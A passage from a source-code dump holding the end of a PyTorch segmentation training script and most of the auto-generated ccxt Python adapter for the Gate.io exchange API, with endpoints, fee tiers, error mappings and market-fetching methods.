utils.batch_intersection_union(pred.data, target, self.nclass)\n 
return correct, labeled, inter, union, loss\n\n self.model.eval()\n total_inter, total_union, total_correct, total_label, total_loss = 0, 0, 0, 0, 0\n for i, (image, dep, target) in enumerate(self.valloader):\n image, dep, target = image.to(self.device), dep.to(self.device), target.to(self.device)\n with torch.no_grad():\n correct, labeled, inter, union, loss = eval_batch(self.model, image, dep, target)\n\n total_correct += correct\n total_label += labeled\n total_inter += inter\n total_union += union\n total_loss += loss.item()\n pixAcc = 1.0 * total_correct / (np.spacing(1) + total_label)\n IOU = 1.0 * total_inter / (np.spacing(1) + total_union)\n mIOU = IOU.mean()\n\n if i % 40 == 0:\n print('eval mean IOU {}'.format(mIOU))\n loss = total_loss / len(self.valloader)\n\n self.writer.add_scalar(\"mean_iou/val\", mIOU, epoch)\n self.writer.add_scalar(\"pixel accuracy/val\", pixAcc, epoch)\n\n return pixAcc, mIOU, loss\n\n\nif __name__ == \"__main__\":\n print(\"-------mark program start----------\")\n # configuration\n args = Dict(yaml.safe_load(open(CONFIG_PATH)))\n args.cuda = (args.use_cuda and torch.cuda.is_available())\n args.resume = None if args.resume=='None' else args.resume\n torch.manual_seed(args.seed)\n\n\n trainer = Trainer(args)\n # import pdb; pdb.set_trace()\n print('Starting Epoch:', trainer.args.start_epoch)\n print('Total Epoches:', trainer.args.epochs)\n trainer.train_n_evaluate()\n\n\n"} {"ext": "py", "sha": "1a303ec63cfa30e4d3af946a584e1b191fd1c6c5", "content": "# -*- coding: utf-8 -*-\n\n# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:\n# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code\n\nfrom ccxt.base.exchange import Exchange\nimport hashlib\nfrom ccxt.base.errors import ExchangeError\nfrom ccxt.base.errors import AuthenticationError\nfrom ccxt.base.errors import PermissionDenied\nfrom ccxt.base.errors import AccountSuspended\nfrom ccxt.base.errors import ArgumentsRequired\nfrom ccxt.base.errors import BadRequest\nfrom ccxt.base.errors import BadSymbol\nfrom ccxt.base.errors import InsufficientFunds\nfrom ccxt.base.errors import InvalidOrder\nfrom ccxt.base.errors import OrderNotFound\nfrom ccxt.base.errors import RateLimitExceeded\nfrom ccxt.base.errors import ExchangeNotAvailable\nfrom ccxt.base.decimal_to_precision import TICK_SIZE\nfrom ccxt.base.precise import Precise\n\n\nclass gateio(Exchange):\n\n def describe(self):\n return self.deep_extend(super(gateio, self).describe(), {\n 'id': 'gateio',\n 'name': 'Gate.io',\n 'countries': ['KR'],\n 'rateLimit': 10 / 3, # 300 requests per second or 3.33ms\n 'version': 'v4',\n 'certified': True,\n 'pro': True,\n 'urls': {\n 'logo': 'https://user-images.githubusercontent.com/1294454/31784029-0313c702-b509-11e7-9ccc-bc0da6a0e435.jpg',\n 'doc': 'https://www.gate.io/docs/apiv4/en/index.html',\n 'www': 'https://gate.io/',\n 'api': {\n 'public': 'https://api.gateio.ws/api/v4',\n 'private': 'https://api.gateio.ws/api/v4',\n },\n 'referral': {\n 'url': 'https://www.gate.io/ref/2436035',\n 'discount': 0.2,\n },\n },\n 'has': {\n 'cancelOrder': True,\n 'createMarketOrder': False,\n 'createOrder': True,\n 'fetchBalance': True,\n 'fetchClosedOrders': True,\n 'fetchCurrencies': True,\n 'fetchDeposits': True,\n 'fetchFundingRate': True,\n 'fetchFundingRateHistory': True,\n 'fetchFundingRates': True,\n 'fetchIndexOHLCV': True,\n 'fetchMarkets': True,\n 'fetchMarkOHLCV': True,\n 'fetchMyTrades': True,\n 'fetchOHLCV': True,\n 'fetchOpenOrders': True,\n 'fetchOrder': True,\n 
'fetchPremiumIndexOHLCV': False,\n 'fetchTicker': True,\n 'fetchTickers': True,\n 'fetchTime': False,\n 'fetchTrades': True,\n 'fetchWithdrawals': True,\n 'transfer': True,\n 'withdraw': True,\n },\n 'api': {\n 'public': {\n 'spot': {\n 'get': {\n 'currencies': 1,\n 'currencies/{currency}': 1,\n 'currency_pairs': 1,\n 'currency_pairs/{currency_pair}': 1,\n 'tickers': 1,\n 'order_book': 1,\n 'trades': 1,\n 'candlesticks': 1,\n },\n },\n 'margin': {\n 'get': {\n 'currency_pairs': 1,\n 'currency_pairs/{currency_pair}': 1,\n 'cross/currencies': 1,\n 'cross/currencies/{currency}': 1,\n },\n },\n 'futures': {\n 'get': {\n '{settle}/contracts': 1.5,\n '{settle}/contracts/{contract}': 1.5,\n '{settle}/order_book': 1.5,\n '{settle}/trades': 1.5,\n '{settle}/candlesticks': 1.5,\n '{settle}/tickers': 1.5,\n '{settle}/funding_rate': 1.5,\n '{settle}/insurance': 1.5,\n '{settle}/contract_stats': 1.5,\n '{settle}/liq_orders': 1.5,\n },\n },\n 'delivery': {\n 'get': {\n '{settle}/contracts': 1.5,\n '{settle}/contracts/{contract}': 1.5,\n '{settle}/order_book': 1.5,\n '{settle}/trades': 1.5,\n '{settle}/candlesticks': 1.5,\n '{settle}/tickers': 1.5,\n '{settle}/insurance': 1.5,\n },\n },\n },\n 'private': {\n 'withdrawals': {\n 'post': {\n '': 3000, # 3000 = 10 seconds\n },\n 'delete': {\n '{withdrawal_id}': 300,\n },\n },\n 'wallet': {\n 'get': {\n 'deposit_address': 300,\n 'withdrawals': 300,\n 'deposits': 300,\n 'sub_account_transfers': 300,\n 'withdraw_status': 300,\n 'sub_account_balances': 300,\n 'fee': 300,\n },\n 'post': {\n 'transfers': 300,\n 'sub_account_transfers': 300,\n },\n },\n 'spot': {\n 'get': {\n 'accounts': 1,\n 'open_orders': 1,\n 'orders': 1,\n 'orders/{order_id}': 1,\n 'my_trades': 1,\n 'price_orders': 1,\n 'price_orders/{order_id}': 1,\n },\n 'post': {\n 'batch_orders': 1,\n 'orders': 1,\n 'cancel_batch_orders': 1,\n 'price_orders': 1,\n },\n 'delete': {\n 'orders': 1,\n 'orders/{order_id}': 1,\n 'price_orders': 1,\n 'price_orders/{order_id}': 1,\n },\n },\n 'margin': {\n 'get': {\n 'accounts': 1.5,\n 'account_book': 1.5,\n 'funding_accounts': 1.5,\n 'loans': 1.5,\n 'loans/{loan_id}': 1.5,\n 'loans/{loan_id}/repayment': 1.5,\n 'loan_records': 1.5,\n 'loan_records/{load_record_id}': 1.5,\n 'auto_repay': 1.5,\n 'transferable': 1.5,\n 'cross/accounts': 1.5,\n 'cross/account_book': 1.5,\n 'cross/loans': 1.5,\n 'cross/loans/{loan_id}': 1.5,\n 'cross/loans/repayments': 1.5,\n 'cross/transferable': 1.5,\n },\n 'post': {\n 'loans': 1.5,\n 'merged_loans': 1.5,\n 'loans/{loan_id}/repayment': 1.5,\n 'auto_repay': 1.5,\n 'cross/loans': 1.5,\n 'cross/loans/repayments': 1.5,\n },\n 'patch': {\n 'loans/{loan_id}': 1.5,\n 'loan_records/{loan_record_id}': 1.5,\n },\n 'delete': {\n 'loans/{loan_id}': 1.5,\n },\n },\n 'futures': {\n 'get': {\n '{settle}/accounts': 1.5,\n '{settle}/account_book': 1.5,\n '{settle}/positions': 1.5,\n '{settle}/positions/{contract}': 1.5,\n '{settle}/orders': 1.5,\n '{settle}/orders/{order_id}': 1.5,\n '{settle}/my_trades': 1.5,\n '{settle}/position_close': 1.5,\n '{settle}/liquidates': 1.5,\n '{settle}/price_orders': 1.5,\n '{settle}/price_orders/{order_id}': 1.5,\n },\n 'post': {\n '{settle}/positions/{contract}/margin': 1.5,\n '{settle}/positions/{contract}/leverage': 1.5,\n '{settle}/positions/{contract}/risk_limit': 1.5,\n '{settle}/dual_mode': 1.5,\n '{settle}/dual_comp/positions/{contract}': 1.5,\n '{settle}/dual_comp/positions/{contract}/margin': 1.5,\n '{settle}/dual_comp/positions/{contract}/leverage': 1.5,\n 
'{settle}/dual_comp/positions/{contract}/risk_limit': 1.5,\n '{settle}/orders': 1.5,\n '{settle}/price_orders': 1.5,\n },\n 'delete': {\n '{settle}/orders': 1.5,\n '{settle}/orders/{order_id}': 1.5,\n '{settle}/price_orders': 1.5,\n '{settle}/price_orders/{order_id}': 1.5,\n },\n },\n 'delivery': {\n 'get': {\n '{settle}/accounts': 1.5,\n '{settle}/account_book': 1.5,\n '{settle}/positions': 1.5,\n '{settle}/positions/{contract}': 1.5,\n '{settle}/orders': 1.5,\n '{settle}/orders/{order_id}': 1.5,\n '{settle}/my_trades': 1.5,\n '{settle}/position_close': 1.5,\n '{settle}/liquidates': 1.5,\n '{settle}/price_orders': 1.5,\n '{settle}/price_orders/{order_id}': 1.5,\n },\n 'post': {\n '{settle}/positions/{contract}/margin': 1.5,\n '{settle}/positions/{contract}/leverage': 1.5,\n '{settle}/positions/{contract}/risk_limit': 1.5,\n '{settle}/orders': 1.5,\n '{settle}/price_orders': 1.5,\n },\n 'delete': {\n '{settle}/orders': 1.5,\n '{settle}/orders/{order_id}': 1.5,\n '{settle}/price_orders': 1.5,\n '{settle}/price_orders/{order_id}': 1.5,\n },\n },\n },\n },\n 'timeframes': {\n '10s': '10s',\n '1m': '1m',\n '5m': '5m',\n '15m': '15m',\n '30m': '30m',\n '1h': '1h',\n '4h': '4h',\n '8h': '8h',\n '1d': '1d',\n '7d': '7d',\n },\n # copied from gateiov2\n 'commonCurrencies': {\n '88MPH': 'MPH',\n 'BIFI': 'Bitcoin File',\n 'BOX': 'DefiBox',\n 'BTCBEAR': 'BEAR',\n 'BTCBULL': 'BULL',\n 'BYN': 'Beyond Finance',\n 'EGG': 'Goose Finance',\n 'GTC': 'Game.com', # conflict with Gitcoin and Gastrocoin\n 'GTC_HT': 'Game.com HT',\n 'GTC_BSC': 'Game.com BSC',\n 'HIT': 'HitChain',\n 'MPH': 'Morpher', # conflict with 88MPH\n 'RAI': 'Rai Reflex Index', # conflict with RAI Finance\n 'SBTC': 'Super Bitcoin',\n 'STX': 'Stox',\n 'TNC': 'Trinity Network Credit',\n 'TON': 'TONToken',\n 'VAI': 'VAIOT',\n },\n 'requiredCredentials': {\n 'apiKey': True,\n 'secret': True,\n },\n 'options': {\n 'networks': {\n 'TRC20': 'TRX',\n 'ERC20': 'ETH',\n 'BEP20': 'BSC',\n },\n 'accountsByType': {\n 'spot': 'spot',\n 'margin': 'margin',\n 'futures': 'futures',\n 'delivery': 'delivery',\n },\n 'defaultType': 'spot',\n 'swap': {\n 'fetchMarkets': {\n 'settlementCurrencies': ['usdt', 'btc'],\n },\n },\n 'futures': {\n 'fetchMarkets': {\n 'settlementCurrencies': ['usdt', 'btc'],\n },\n },\n },\n 'precisionMode': TICK_SIZE,\n 'fees': {\n 'trading': {\n 'tierBased': True,\n 'feeSide': 'get',\n 'percentage': True,\n 'maker': self.parse_number('0.002'),\n 'taker': self.parse_number('0.002'),\n 'tiers': {\n # volume is in BTC\n 'maker': [\n [self.parse_number('0'), self.parse_number('0.002')],\n [self.parse_number('1.5'), self.parse_number('0.00185')],\n [self.parse_number('3'), self.parse_number('0.00175')],\n [self.parse_number('6'), self.parse_number('0.00165')],\n [self.parse_number('12.5'), self.parse_number('0.00155')],\n [self.parse_number('25'), self.parse_number('0.00145')],\n [self.parse_number('75'), self.parse_number('0.00135')],\n [self.parse_number('200'), self.parse_number('0.00125')],\n [self.parse_number('500'), self.parse_number('0.00115')],\n [self.parse_number('1250'), self.parse_number('0.00105')],\n [self.parse_number('2500'), self.parse_number('0.00095')],\n [self.parse_number('3000'), self.parse_number('0.00085')],\n [self.parse_number('6000'), self.parse_number('0.00075')],\n [self.parse_number('11000'), self.parse_number('0.00065')],\n [self.parse_number('20000'), self.parse_number('0.00055')],\n [self.parse_number('40000'), self.parse_number('0.00055')],\n [self.parse_number('75000'), self.parse_number('0.00055')],\n 
],\n 'taker': [\n [self.parse_number('0'), self.parse_number('0.002')],\n [self.parse_number('1.5'), self.parse_number('0.00195')],\n [self.parse_number('3'), self.parse_number('0.00185')],\n [self.parse_number('6'), self.parse_number('0.00175')],\n [self.parse_number('12.5'), self.parse_number('0.00165')],\n [self.parse_number('25'), self.parse_number('0.00155')],\n [self.parse_number('75'), self.parse_number('0.00145')],\n [self.parse_number('200'), self.parse_number('0.00135')],\n [self.parse_number('500'), self.parse_number('0.00125')],\n [self.parse_number('1250'), self.parse_number('0.00115')],\n [self.parse_number('2500'), self.parse_number('0.00105')],\n [self.parse_number('3000'), self.parse_number('0.00095')],\n [self.parse_number('6000'), self.parse_number('0.00085')],\n [self.parse_number('11000'), self.parse_number('0.00075')],\n [self.parse_number('20000'), self.parse_number('0.00065')],\n [self.parse_number('40000'), self.parse_number('0.00065')],\n [self.parse_number('75000'), self.parse_number('0.00065')],\n ],\n },\n },\n 'swap': {\n 'tierBased': True,\n 'feeSide': 'base',\n 'percentage': True,\n 'maker': self.parse_number('0.0'),\n 'taker': self.parse_number('0.0005'),\n 'tiers': {\n 'maker': [\n [self.parse_number('0'), self.parse_number('0.0000')],\n [self.parse_number('1.5'), self.parse_number('-0.00005')],\n [self.parse_number('3'), self.parse_number('-0.00005')],\n [self.parse_number('6'), self.parse_number('-0.00005')],\n [self.parse_number('12.5'), self.parse_number('-0.00005')],\n [self.parse_number('25'), self.parse_number('-0.00005')],\n [self.parse_number('75'), self.parse_number('-0.00005')],\n [self.parse_number('200'), self.parse_number('-0.00005')],\n [self.parse_number('500'), self.parse_number('-0.00005')],\n [self.parse_number('1250'), self.parse_number('-0.00005')],\n [self.parse_number('2500'), self.parse_number('-0.00005')],\n [self.parse_number('3000'), self.parse_number('-0.00008')],\n [self.parse_number('6000'), self.parse_number('-0.01000')],\n [self.parse_number('11000'), self.parse_number('-0.01002')],\n [self.parse_number('20000'), self.parse_number('-0.01005')],\n [self.parse_number('40000'), self.parse_number('-0.02000')],\n [self.parse_number('75000'), self.parse_number('-0.02005')],\n ],\n 'taker': [\n [self.parse_number('0'), self.parse_number('0.00050')],\n [self.parse_number('1.5'), self.parse_number('0.00048')],\n [self.parse_number('3'), self.parse_number('0.00046')],\n [self.parse_number('6'), self.parse_number('0.00044')],\n [self.parse_number('12.5'), self.parse_number('0.00042')],\n [self.parse_number('25'), self.parse_number('0.00040')],\n [self.parse_number('75'), self.parse_number('0.00038')],\n [self.parse_number('200'), self.parse_number('0.00036')],\n [self.parse_number('500'), self.parse_number('0.00034')],\n [self.parse_number('1250'), self.parse_number('0.00032')],\n [self.parse_number('2500'), self.parse_number('0.00030')],\n [self.parse_number('3000'), self.parse_number('0.00030')],\n [self.parse_number('6000'), self.parse_number('0.00030')],\n [self.parse_number('11000'), self.parse_number('0.00030')],\n [self.parse_number('20000'), self.parse_number('0.00030')],\n [self.parse_number('40000'), self.parse_number('0.00030')],\n [self.parse_number('75000'), self.parse_number('0.00030')],\n ],\n },\n },\n },\n # https://www.gate.io/docs/apiv4/en/index.html#label-list\n 'exceptions': {\n 'INVALID_PARAM_VALUE': BadRequest,\n 'INVALID_PROTOCOL': BadRequest,\n 'INVALID_ARGUMENT': BadRequest,\n 'INVALID_REQUEST_BODY': 
BadRequest,\n 'MISSING_REQUIRED_PARAM': ArgumentsRequired,\n 'BAD_REQUEST': BadRequest,\n 'INVALID_CONTENT_TYPE': BadRequest,\n 'NOT_ACCEPTABLE': BadRequest,\n 'METHOD_NOT_ALLOWED': BadRequest,\n 'NOT_FOUND': ExchangeError,\n 'INVALID_CREDENTIALS': AuthenticationError,\n 'INVALID_KEY': AuthenticationError,\n 'IP_FORBIDDEN': AuthenticationError,\n 'READ_ONLY': PermissionDenied,\n 'INVALID_SIGNATURE': AuthenticationError,\n 'MISSING_REQUIRED_HEADER': AuthenticationError,\n 'REQUEST_EXPIRED': AuthenticationError,\n 'ACCOUNT_LOCKED': AccountSuspended,\n 'FORBIDDEN': PermissionDenied,\n 'SUB_ACCOUNT_NOT_FOUND': ExchangeError,\n 'SUB_ACCOUNT_LOCKED': AccountSuspended,\n 'MARGIN_BALANCE_EXCEPTION': ExchangeError,\n 'MARGIN_TRANSFER_FAILED': ExchangeError,\n 'TOO_MUCH_FUTURES_AVAILABLE': ExchangeError,\n 'FUTURES_BALANCE_NOT_ENOUGH': InsufficientFunds,\n 'ACCOUNT_EXCEPTION': ExchangeError,\n 'SUB_ACCOUNT_TRANSFER_FAILED': ExchangeError,\n 'ADDRESS_NOT_USED': ExchangeError,\n 'TOO_FAST': RateLimitExceeded,\n 'WITHDRAWAL_OVER_LIMIT': ExchangeError,\n 'API_WITHDRAW_DISABLED': ExchangeNotAvailable,\n 'INVALID_WITHDRAW_ID': ExchangeError,\n 'INVALID_WITHDRAW_CANCEL_STATUS': ExchangeError,\n 'INVALID_PRECISION': InvalidOrder,\n 'INVALID_CURRENCY': BadSymbol,\n 'INVALID_CURRENCY_PAIR': BadSymbol,\n 'POC_FILL_IMMEDIATELY': ExchangeError,\n 'ORDER_NOT_FOUND': OrderNotFound,\n 'ORDER_CLOSED': InvalidOrder,\n 'ORDER_CANCELLED': InvalidOrder,\n 'QUANTITY_NOT_ENOUGH': InvalidOrder,\n 'BALANCE_NOT_ENOUGH': InsufficientFunds,\n 'MARGIN_NOT_SUPPORTED': InvalidOrder,\n 'MARGIN_BALANCE_NOT_ENOUGH': InsufficientFunds,\n 'AMOUNT_TOO_LITTLE': InvalidOrder,\n 'AMOUNT_TOO_MUCH': InvalidOrder,\n 'REPEATED_CREATION': InvalidOrder,\n 'LOAN_NOT_FOUND': OrderNotFound,\n 'LOAN_RECORD_NOT_FOUND': OrderNotFound,\n 'NO_MATCHED_LOAN': ExchangeError,\n 'NOT_MERGEABLE': ExchangeError,\n 'NO_CHANGE': ExchangeError,\n 'REPAY_TOO_MUCH': ExchangeError,\n 'TOO_MANY_CURRENCY_PAIRS': InvalidOrder,\n 'TOO_MANY_ORDERS': InvalidOrder,\n 'MIXED_ACCOUNT_TYPE': InvalidOrder,\n 'AUTO_BORROW_TOO_MUCH': ExchangeError,\n 'TRADE_RESTRICTED': InsufficientFunds,\n 'USER_NOT_FOUND': ExchangeError,\n 'CONTRACT_NO_COUNTER': ExchangeError,\n 'CONTRACT_NOT_FOUND': BadSymbol,\n 'RISK_LIMIT_EXCEEDED': ExchangeError,\n 'INSUFFICIENT_AVAILABLE': InsufficientFunds,\n 'LIQUIDATE_IMMEDIATELY': InvalidOrder,\n 'LEVERAGE_TOO_HIGH': InvalidOrder,\n 'LEVERAGE_TOO_LOW': InvalidOrder,\n 'ORDER_NOT_OWNED': ExchangeError,\n 'ORDER_FINISHED': ExchangeError,\n 'POSITION_CROSS_MARGIN': ExchangeError,\n 'POSITION_IN_LIQUIDATION': ExchangeError,\n 'POSITION_IN_CLOSE': ExchangeError,\n 'POSITION_EMPTY': InvalidOrder,\n 'REMOVE_TOO_MUCH': ExchangeError,\n 'RISK_LIMIT_NOT_MULTIPLE': ExchangeError,\n 'RISK_LIMIT_TOO_HIGH': ExchangeError,\n 'RISK_LIMIT_TOO_lOW': ExchangeError,\n 'PRICE_TOO_DEVIATED': InvalidOrder,\n 'SIZE_TOO_LARGE': InvalidOrder,\n 'SIZE_TOO_SMALL': InvalidOrder,\n 'PRICE_OVER_LIQUIDATION': InvalidOrder,\n 'PRICE_OVER_BANKRUPT': InvalidOrder,\n 'ORDER_POC_IMMEDIATE': InvalidOrder,\n 'INCREASE_POSITION': InvalidOrder,\n 'CONTRACT_IN_DELISTING': ExchangeError,\n 'INTERNAL': ExchangeError,\n 'SERVER_ERROR': ExchangeError,\n 'TOO_BUSY': ExchangeNotAvailable,\n },\n })\n\n def fetch_markets(self, params={}):\n # :param params['type']: 'spot', 'margin', 'futures' or 'delivery'\n # :param params['settle']: The quote currency\n defaultType = self.safe_string_2(self.options, 'fetchMarkets', 'defaultType', 'spot')\n type = self.safe_string(params, 'type', defaultType)\n 
query = self.omit(params, 'type')\n spot = (type == 'spot')\n margin = (type == 'margin')\n futures = (type == 'futures')\n swap = (type == 'swap')\n option = (type == 'option')\n if not spot and not margin and not futures and not swap:\n raise ExchangeError(self.id + \" does not support '\" + type + \"' type, set exchange.options['defaultType'] to \" + \"'spot', 'margin', 'swap' or 'futures'\") # eslint-disable-line quotes\n response = None\n result = []\n method = self.get_supported_mapping(type, {\n 'spot': 'publicSpotGetCurrencyPairs',\n 'margin': 'publicMarginGetCurrencyPairs',\n 'swap': 'publicFuturesGetSettleContracts',\n 'futures': 'publicDeliveryGetSettleContracts',\n })\n if swap or futures or option:\n settlementCurrencies = self.get_settlement_currencies(type, 'fetchMarkets')\n for c in range(0, len(settlementCurrencies)):\n settle = settlementCurrencies[c]\n query['settle'] = settle\n response = getattr(self, method)(query)\n # Perpetual swap\n # [\n # {\n # \"name\": \"BTC_USDT\",\n # \"type\": \"direct\",\n # \"quanto_multiplier\": \"0.0001\",\n # \"ref_discount_rate\": \"0\",\n # \"order_price_deviate\": \"0.5\",\n # \"maintenance_rate\": \"0.005\",\n # \"mark_type\": \"index\",\n # \"last_price\": \"38026\",\n # \"mark_price\": \"37985.6\",\n # \"index_price\": \"37954.92\",\n # \"funding_rate_indicative\": \"0.000219\",\n # \"mark_price_round\": \"0.01\",\n # \"funding_offset\": 0,\n # \"in_delisting\": False,\n # \"risk_limit_base\": \"1000000\",\n # \"interest_rate\": \"0.0003\",\n # \"order_price_round\": \"0.1\",\n # \"order_size_min\": 1,\n # \"ref_rebate_rate\": \"0.2\",\n # \"funding_interval\": 28800,\n # \"risk_limit_step\": \"1000000\",\n # \"leverage_min\": \"1\",\n # \"leverage_max\": \"100\",\n # \"risk_limit_max\": \"8000000\",\n # \"maker_fee_rate\": \"-0.00025\",\n # \"taker_fee_rate\": \"0.00075\",\n # \"funding_rate\": \"0.002053\",\n # \"order_size_max\": 1000000,\n # \"funding_next_apply\": 1610035200,\n # \"short_users\": 977,\n # \"config_change_time\": 1609899548,\n # \"trade_size\": 28530850594,\n # \"position_size\": 5223816,\n # \"long_users\": 455,\n # \"funding_impact_value\": \"60000\",\n # \"orders_limit\": 50,\n # \"trade_id\": 10851092,\n # \"orderbook_id\": 2129638396\n # }\n # ]\n #\n # Delivery Futures\n # [\n # {\n # \"name\": \"BTC_USDT_20200814\",\n # \"underlying\": \"BTC_USDT\",\n # \"cycle\": \"WEEKLY\",\n # \"type\": \"direct\",\n # \"quanto_multiplier\": \"0.0001\",\n # \"mark_type\": \"index\",\n # \"last_price\": \"9017\",\n # \"mark_price\": \"9019\",\n # \"index_price\": \"9005.3\",\n # \"basis_rate\": \"0.185095\",\n # \"basis_value\": \"13.7\",\n # \"basis_impact_value\": \"100000\",\n # \"settle_price\": \"0\",\n # \"settle_price_interval\": 60,\n # \"settle_price_duration\": 1800,\n # \"settle_fee_rate\": \"0.0015\",\n # \"expire_time\": 1593763200,\n # \"order_price_round\": \"0.1\",\n # \"mark_price_round\": \"0.1\",\n # \"leverage_min\": \"1\",\n # \"leverage_max\": \"100\",\n # \"maintenance_rate\": \"1000000\",\n # \"risk_limit_base\": \"140.726652109199\",\n # \"risk_limit_step\": \"1000000\",\n # \"risk_limit_max\": \"8000000\",\n # \"maker_fee_rate\": \"-0.00025\",\n # \"taker_fee_rate\": \"0.00075\",\n # \"ref_discount_rate\": \"0\",\n # \"ref_rebate_rate\": \"0.2\",\n # \"order_price_deviate\": \"0.5\",\n # \"order_size_min\": 1,\n # \"order_size_max\": 1000000,\n # \"orders_limit\": 50,\n # \"orderbook_id\": 63,\n # \"trade_id\": 26,\n # \"trade_size\": 435,\n # \"position_size\": 130,\n # 
\"config_change_time\": 1593158867,\n # \"in_delisting\": False\n # }\n # ]\n #\n for i in range(0, len(response)):\n market = response[i]\n id = self.safe_string(market, 'name')\n baseId, quoteId, date = id.split('_')\n linear = quoteId.lower() == settle\n inverse = baseId.lower() == settle\n base = self.safe_currency_code(baseId)\n quote = self.safe_currency_code(quoteId)\n symbol = ''\n if date:\n symbol = base + '/' + quote + '-' + date + ':' + self.safe_currency_code(settle)\n else:\n symbol = base + '/' + quote + ':' + self.safe_currency_code(settle)\n priceDeviate = self.safe_string(market, 'order_price_deviate')\n markPrice = self.safe_string(market, 'mark_price')\n minMultiplier = Precise.string_sub('1', priceDeviate)\n maxMultiplier = Precise.string_add('1', priceDeviate)\n minPrice = Precise.string_mul(minMultiplier, markPrice)\n maxPrice = Precise.string_mul(maxMultiplier, markPrice)\n takerPercent = self.safe_string(market, 'taker_fee_rate')\n makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent)\n feeIndex = 'swap' if (type == 'futures') else type\n pricePrecision = self.safe_number(market, 'order_price_round')\n result.append({\n 'info': market,\n 'id': id,\n 'baseId': baseId,\n 'quoteId': quoteId,\n 'settleId': self.safe_symbol(settle),\n 'base': base,\n 'quote': quote,\n 'symbol': symbol,\n 'type': type,\n 'spot': spot,\n 'margin': margin,\n 'futures': futures,\n 'swap': swap,\n 'option': option,\n 'derivative': True,\n 'contract': True,\n 'linear': linear,\n 'inverse': inverse,\n # Fee is in %, so divide by 100\n 'taker': self.parse_number(Precise.string_div(takerPercent, '100')),\n 'maker': self.parse_number(Precise.string_div(makerPercent, '100')),\n 'contractSize': self.safe_string(market, 'quanto_multiplier'),\n 'precision': {\n 'amount': self.parse_number('1'),\n 'price': pricePrecision,\n },\n 'limits': {\n 'leverage': {\n 'min': self.safe_number(market, 'leverage_min'),\n 'max': self.safe_number(market, 'leverage_max'),\n },\n 'amount': {\n 'min': self.safe_number(market, 'order_size_min'),\n 'max': self.safe_number(market, 'order_size_max'),\n },\n 'price': {\n 'min': minPrice,\n 'max': maxPrice,\n },\n },\n 'expiry': self.safe_integer(market, 'expire_time'),\n 'fees': self.safe_value(self.fees, feeIndex, {}),\n })\n else:\n response = getattr(self, method)(query)\n #\n # Spot\n # [\n # {\n # \"id\": \"DEGO_USDT\",\n # \"base\": \"DEGO\",\n # \"quote\": \"USDT\",\n # \"fee\": \"0.2\",\n # \"min_quote_amount\": \"1\",\n # \"amount_precision\": \"4\",\n # \"precision\": \"4\",\n # \"trade_status\": \"tradable\",\n # \"sell_start\": \"0\",\n # \"buy_start\": \"0\"\n # }\n # ]\n #\n # Margin\n # [\n # {\n # \"id\": \"ETH_USDT\",\n # \"base\": \"ETH\",\n # \"quote\": \"USDT\",\n # \"leverage\": 3,\n # \"min_base_amount\": \"0.01\",\n # \"min_quote_amount\": \"100\",\n # \"max_quote_amount\": \"1000000\"\n # }\n # ]\n #\n for i in range(0, len(response)):\n market = response[i]\n id = self.safe_string(market, 'id')\n spot = (type == 'spot')\n futures = (type == 'futures')\n swap = (type == 'swap')\n option = (type == 'option')\n baseId, quoteId = id.split('_')\n base = self.safe_currency_code(baseId)\n quote = self.safe_currency_code(quoteId)\n symbol = base + '/' + quote\n takerPercent = self.safe_string(market, 'fee')\n makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent)\n amountPrecisionString = self.safe_string(market, 'amount_precision')\n pricePrecisionString = self.safe_string(market, 'precision')\n amountPrecision = 
self.parse_number(self.parse_precision(amountPrecisionString))\n pricePrecision = self.parse_number(self.parse_precision(pricePrecisionString))\n tradeStatus = self.safe_string(market, 'trade_status')\n result.append({\n 'info': market,\n 'id': id,\n 'baseId': baseId,\n 'quoteId': quoteId,\n 'base': base,\n 'quote': quote,\n 'symbol': symbol,\n 'type': type,\n 'spot': spot,\n 'margin': margin,\n 'futures': futures,\n 'swap': swap,\n 'option': option,\n 'contract': False,\n 'derivative': False,\n 'linear': False,\n 'inverse': False,\n # Fee is in %, so divide by 100\n 'taker': self.parse_number(Precise.string_div(takerPercent, '100')),\n 'maker': self.parse_number(Precise.string_div(makerPercent, '100')),\n 'precision': {\n 'amount': amountPrecision,\n 'price': pricePrecision,\n },\n 'active': tradeStatus == 'tradable',\n 'limits': {\n 'amount': {\n 'min': amountPrecision,\n 'max': None,\n },\n 'price': {\n 'min': pricePrecision,\n 'max': None,\n },\n 'cost': {\n 'min': self.safe_number(market, 'min_quote_amount'),\n 'max': None,\n },\n 'leverage': {\n 'max': self.safe_number(market, 'lever', 1),\n },\n },\n })\n return result\n\n def prepare_request(self, market):\n if market['contract']:\n return {\n 'contract': market['id'],\n 'settle': market['settleId'],\n }\n else:\n return {\n 'currency_pair': market['id'],\n }\n\n def get_settlement_currencies(self, type, method):\n options = self.safe_value(self.options, type, {}) # ['BTC', 'USDT'] unified codes\n fetchMarketsContractOptions = self.safe_value(options, method, {})\n defaultSettle = type == ['usdt'] if 'swap' else ['btc']\n return self.safe_value(fetchMarketsContractOptions, 'settlementCurrencies', defaultSettle)\n\n def fetch_currencies(self, params={}):\n response = self.publicSpotGetCurrencies(params)\n #\n # {\n # \"currency\": \"BCN\",\n # \"delisted\": False,\n # \"withdraw_disabled\": True,\n # \"withdraw_delayed\": False,\n # \"deposit_disabled\": True,\n # \"trade_disabled\": False\n # }\n #\n result = {}\n # TODO: remove magic constants\n amountPrecision = self.parse_number('1e-6')\n for i in range(0, len(response)):\n entry = response[i]\n currencyId = self.safe_string(entry, 'currency')\n code = self.safe_currency_code(currencyId)\n delisted = self.safe_value(entry, 'delisted')\n withdraw_disabled = self.safe_value(entry, 'withdraw_disabled')\n deposit_disabled = self.safe_value(entry, 'disabled_disabled')\n trade_disabled = self.safe_value(entry, 'trade_disabled')\n active = not (delisted and withdraw_disabled and deposit_disabled and trade_disabled)\n result[code] = {\n 'id': currencyId,\n 'name': None,\n 'code': code,\n 'precision': amountPrecision,\n 'info': entry,\n 'active': active,\n 'fee': None,\n 'fees': [],\n 'limits': self.limits,\n }\n return result\n\n def fetch_funding_rate(self, symbol, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'contract': market['id'],\n 'settle': market['quote'].lower(),\n }\n response = self.publicFuturesGetSettleContractsContract(self.extend(request, params))\n #\n # [\n # {\n # \"name\": \"BTC_USDT\",\n # \"type\": \"direct\",\n # \"quanto_multiplier\": \"0.0001\",\n # 